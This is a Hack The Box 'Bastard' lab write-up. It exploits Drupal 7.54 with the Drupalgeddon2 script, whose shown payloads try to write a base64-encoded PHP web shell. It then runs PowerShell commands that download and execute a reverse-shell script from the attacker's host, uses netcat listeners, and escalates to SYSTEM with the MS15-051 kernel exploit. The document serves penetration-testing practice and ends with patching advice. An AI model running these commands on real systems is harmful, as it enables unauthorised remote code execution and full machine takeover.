Thumbnail: gravatar

HacktheBox 'Bastard' writeup

by on under writeups
19 minute read

‘Bastard’ HTB Writeup

 

Host Information

Hostname IP Address Operating System Difficulty Level
Bastard 10.10.10.9 Windows Medium

Bastard HTB Card


 

view all writeups here

 


Writeup Contents


 

Initial Recon

 

Again, we start with our initial recon of the target system. We’ll use a different script, AutoRecon this time. You can find the information on the script and install information on the github page

 

nmap information

# Nmap 7.80 scan initiated Mon Feb 10 09:49:30 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /writeups/HTB/bastard/enumeration/results/10.10.10.9/scans/_full_tcp_nmap.txt -oX /writeups/HTB/bastard/enumeration/results/10.10.10.9/scans/xml/_full_tcp_nmap.xml 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up, received user-set (0.034s latency).
Scanned at 2020-02-10 09:49:30 CST for 214s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT      STATE SERVICE REASON          VERSION
80/tcp    open  http    syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries 
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php 
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ 
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ 
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ 
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc   syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=2/10%OT=80%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5E417C60%P=x86_64-pc-linux-gnu)
SEQ(SP=100%GCD=1%ISR=10E%TI=I%II=I%SS=S%TS=7)
OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=80%W=2000%O=M54DNW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.009 days (since Mon Feb 10 09:39:32 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   28.45 ms 10.10.14.1
2   28.53 ms 10.10.10.9

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 10 09:53:04 2020 -- 1 IP address (1 host up) scanned in 214.65 seconds

We see we have a Windows server (likely 2008R2) with both HTTP open and two RPC ports.

 

examining HTTP

Let’s check out HTTP on port 80 first. Upon hitting the main URL, we’re redirected to a login page. There’s not much info on the page besides the login fields, a Create New Account, and a Request New Password links. There’s a small footer at the bottom that says “Powered by Drupal,” so we have a good idea of the framework the website is using., but we don’t know the version yet. Viewing the page source seemes to indicate it is Durpal 7.

Let’s go ahead and look for default creds to Drupal 7, if there are any, and check out what might exist on searchsploit for the version. From some quick searching, it looks like the default admin user is “admin” but there is no default password. The source doesn’t give a hint, and trying admin/admin doesn’t seem to work.

Looking at robots.txt from our initial enumeration enumeration though, yields some interesting potential results:

# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

So we know the server is running PHP, which gives us some good information on potential attack surface, and we see soem basic URI structure of users being passed as query strings. We also see that admin directories are disallowed. Admin as we saw earlier expectedly returns a 403. Trying to visit http://10.10.10.9/admin/q?=admin/login to attempt to “force” a login results in a 403 Forbidden as well.

Going to CHANGELOG.txt, we see that there seems to be some vulnerabilities patched, and we see the current Drupal version (assume the doc is up to date) - 7.54. WWe also see that the IIS server hosting the Drupal site is 7.5.

Moving on to searchsploit, we see a number of exploits returned:

root@kali:/writeups/HTB/bastard/exploits# searchsploit drupal 7.5
-------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                            |  Path
                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)  | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (Po | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code | exploits/php/webapps/44449.rb
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Looks like the top two results need authetnication in order to run the exploit, which we don’t know yet. The third result could be promising, let’s examine it.

 

finding a drupal exploit

Let’s go ahead and save the exploit locally to our exploits folder, then veiw it to see what we need to change.

root@kali:/writeups/HTB/bastard/exploits# searchsploit -m exploits/php/webapps/44449.rb
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

Copied to: /writeups/HTB/bastard/exploits/44449.rb


root@kali:/writeups/HTB/bastard/exploits# mv 44449.rb drupal_rce.rb

When running the script to get usage information, we encounter the following:

root@kali:/writeups/HTB/bastard/exploits# ruby drupal_rce.rb 
ruby: warning: shebang line ending with \r may cause problems
Traceback (most recent call last):
        2: from drupal_rce.rb:16:in `<main>'
        1: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
/usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- highline/import (LoadError)

So let’s install the highline ruby gem module like so:

root@kali:/writeups/HTB/bastard/exploits# gem install highline
Fetching: highline-2.0.3.gem (100%)
Successfully installed highline-2.0.3
Parsing documentation for highline-2.0.3
Installing ri documentation for highline-2.0.3
Done installing documentation for highline after 1 seconds
1 gem installed

We see the following for usage info:

Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]
Example for target that does not require authentication:
       ruby drupalgeddon2.rb https://example.com
Example for target that does require authentication:
       ruby drupalgeddon2.rb https://example.com --authentication

Since we don’t have credentials, let’s try the unauthenticated version first.

 

initial exploitation

root@kali:/writeups/HTB/bastard/exploits# ruby drupal_rce.rb http://10.10.10.9 --verbose
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[v] HTTP - URL : http://10.10.10.9/CHANGELOG.txt
[v] HTTP - Type: get
[+] Found  : http://10.10.10.9/CHANGELOG.txt    (HTTP Response: 200)    [HTTP Size: 9]
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[v] HTTP - URL : http://10.10.10.9/?q=user/password
[v] HTTP - Type: get
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[v] HTTP - URL : http://10.10.10.9/user/password
[v] HTTP - Type: get
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo PHZWRUFM
[v] Element    : name
[v] PHP fn     : passthru
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo PHZWRUFM
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-arECmTPq5WunM4SaKf45rfoim2E1FAowMBhElJOD99o
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-arECmTPq5WunM4SaKf45rfoim2E1FAowMBhElJOD99o
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-arECmTPq5WunM4SaKf45rfoim2E1FAowMBhElJOD99o
[+] Result : PHZWRUFM
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.9/shell.php)
[v] HTTP - URL : http://10.10.10.9/shell.php
[v] HTTP - Type: get
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[v] Element    : name
[v] PHP fn     : passthru
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-9xww0EbPk0CUe1zOu552rgBgpWkWby1l4T_PtRzM7y4
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-9xww0EbPk0CUe1zOu552rgBgpWkWby1l4T_PtRzM7y4
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-9xww0EbPk0CUe1zOu552rgBgpWkWby1l4T_PtRzM7y4
[v] HTTP - URL : http://10.10.10.9/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: c=hostname
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Existing file   (http://10.10.10.9/sites/default/shell.php)
[v] HTTP - URL : http://10.10.10.9/sites/default/shell.php
[v] HTTP - Type: get
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[v] Element    : name
[v] PHP fn     : passthru
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-nwYlrM9G2ZeetA95w7hhcfCl-5FZFqb-9_WFCfxJUcQ
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-nwYlrM9G2ZeetA95w7hhcfCl-5FZFqb-9_WFCfxJUcQ
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-nwYlrM9G2ZeetA95w7hhcfCl-5FZFqb-9_WFCfxJUcQ
[v] HTTP - URL : http://10.10.10.9/sites/default/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: c=hostname
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Existing file   (http://10.10.10.9/sites/default/files/shell.php)
[v] HTTP - URL : http://10.10.10.9/sites/default/files/shell.php
[v] HTTP - Type: get
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[v] Element    : name
[v] PHP fn     : passthru
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-gMMR9M2cHE4yA9kgQH07LoiuqTn6AK-olCttKYmfxS4
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-gMMR9M2cHE4yA9kgQH07LoiuqTn6AK-olCttKYmfxS4
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-gMMR9M2cHE4yA9kgQH07LoiuqTn6AK-olCttKYmfxS4
[v] HTTP - URL : http://10.10.10.9/sites/default/files/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: c=hostname
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> 

So we don’t have write access to the web server apparently, but we’re dropped into a drupal shell. Earlier up in the output however, the output did mention the exploit found RCE. So this appears to be a handler/wrapper for an OS shell, so that every time we run a command, it’s executed remotely through the Drupal URI. But it seems we have an initial foothold, which is good.

 

further enumeration

Let’s run a systeminfo command to get some basic info on the system:

drupalgeddon2>> systeminfo
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=systeminfo
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-WJURmjUQgI_Fp2Rdz0iVlYRZ5CFrQfYPxgkl0W0PsW4
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-WJURmjUQgI_Fp2Rdz0iVlYRZ5CFrQfYPxgkl0W0PsW4
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-WJURmjUQgI_Fp2Rdz0iVlYRZ5CFrQfYPxgkl0W0PsW4
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          10/2/2020, 5:39:28 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.495 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.509 MB
Virtual Memory: In Use:    586 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

Great, so we see that it is indeed a 2008R2 Datacenter build, allegedly with no hotfixes installed.

Let’s see if we can view what users are on the system

drupalgeddon2>> whoami
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-4c407AErUVd8TvQTXNCwXYYWrnN_Pepi4jX874aon_k
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-4c407AErUVd8TvQTXNCwXYYWrnN_Pepi4jX874aon_k
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-4c407AErUVd8TvQTXNCwXYYWrnN_Pepi4jX874aon_k
nt authority\iusr

 

gaining a foothold

The “net users” command does not seem to work, in multiple variants including URL encoding. Let’s try to see if we can get a more standard shell by leveraging powershell to catch a remote session. Let’s use this powershell script to invoke a remote TCP shell. We’ll save it as shell.ps1 in our exploits folder, and let’s serve that folder over simpleHTTP with python -m SimpleHTTPServer 8080

Now’s let’s attempt to retreive and execute the file with powershell, from our foothold shell on the target host. In the powershell invoke tcp command, I’ve specified my tun0 IP address, as well as port 4444. This may not work well due to the RCE passing through a URL, but let’s give it a shot. We’ll want to run the following:

powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/shell.ps1')"

Executing it on the drupalgeddon2 prompt seems to have the prompt hang/ while executing the process, but if we quickly check a listener we start with nc -lvnp 4444, we see we received a shell from netcat:

root@kali:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.9] 53359
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\drupal-7.54>

The drupal exploit seems to time out on that command and return to the exploit prompt, fortunately, our shell is already caught and appears to be stable.

Continuing our enumeration, we see the users on the system:

PS C:\inetpub\drupal-7.54> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            dimitris                 Guest                    
The command completed with one or more errors.

PS C:\inetpub\drupal-7.54> 

Let’s see if we have permissions to grab the user flag yet.

PS C:\users\dimitris\Desktop> dir


    Directory: C:\users\dimitris\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-ar--         19/3/2017   8:06 ??         32 user.txt   

PS C:\users\dimitris\Desktop> type user.txt
{your_own_flag_here}

It appears we do. Awesome. Let’s figure out how to privesc.

 

Privilege Escalation

Let’s run Sherlock. We’ll place the Sherlock.ps1 file in our exploits folder which is being hosted over simpleHTTP, and download and run it from the initial Drupalgeddon cmd shell. Doing this seems to cause the shell to die, so let’s use the Drupalgeddon shell to spawn another shell:

drupalgeddon2>> powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/shell.ps1')"
PS C:\inetpub\drupal-7.54> powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"

PS C:\inetpub\drupal-7.54>  powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/Sherlock.ps1')"


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
             tml
VulnStatus : Not Vulnerable

 

gaining system via a kernel exploit

As expected, since it’s an unpatched 2008R2 box, there’s a number of kernel exploits we could run. Let’s use ms15-051, since we’ve had success with that. I already have the executable for the compiled PoC, but you can find more information on where to find and how to use this PoC on my Artic writeup.

We’ll start by transferring the exe to our exploits folder, and download the file to the target machine. From the target host we can run:

powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.50:8080/ms15-051.exe','C:\inetpub\drupal-7.54\ms15-051.exe')

The usage instructions for this particular ms15-051 PoC have us run a command in quotes after calling the executable, which, if the exploit works, will be run with NT_AUTHORITY privileges. Let’s have the exe call and run our shell.ps1 script again, we’ll start another listener on 4444 and hopefully catch a system shell.

Start the listener again with nc -lvnp 4444

Then run the exploit with:

PS C:\inetpub\drupal-7.54> .\ms15-051.exe "powershell.exe -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.50:8080/shell.ps1')"

And if we check our listener, we see we got a reverse shell:

root@kali:/writeups/HTB/bastard/exploits# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.9] 58284
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\drupal-7.54>whoami
nt authority\system
PS C:\inetpub\drupal-7.54> 

Awesome, we’re system - from here we can grab root.txt and call it done.

PS C:\inetpub\drupal-7.54> cd c:\users\Administrator\Desktop
PS C:\users\Administrator\Desktop> dir


    Directory: C:\users\Administrator\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-ar--         19/3/2017   7:34 ??         32 root.txt.txt                      


PS C:\users\Administrator\Desktop> type root.txt.txt
{your-fl4g-h3r3}
PS C:\users\Administrator\Desktop> 

 

 

Conclusion

 

  • The Drupal server should be updated/patched to address the RCE vulnerability
  • A Web Application Firewall (WAF) would be ideal to be set in place on the webserver
  • The OS should be patched to mitigate kernel exploits and other security vulnerabilities.

 

 

All for now; until next time.

~@initinfosec

hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep
comments powered by Disqus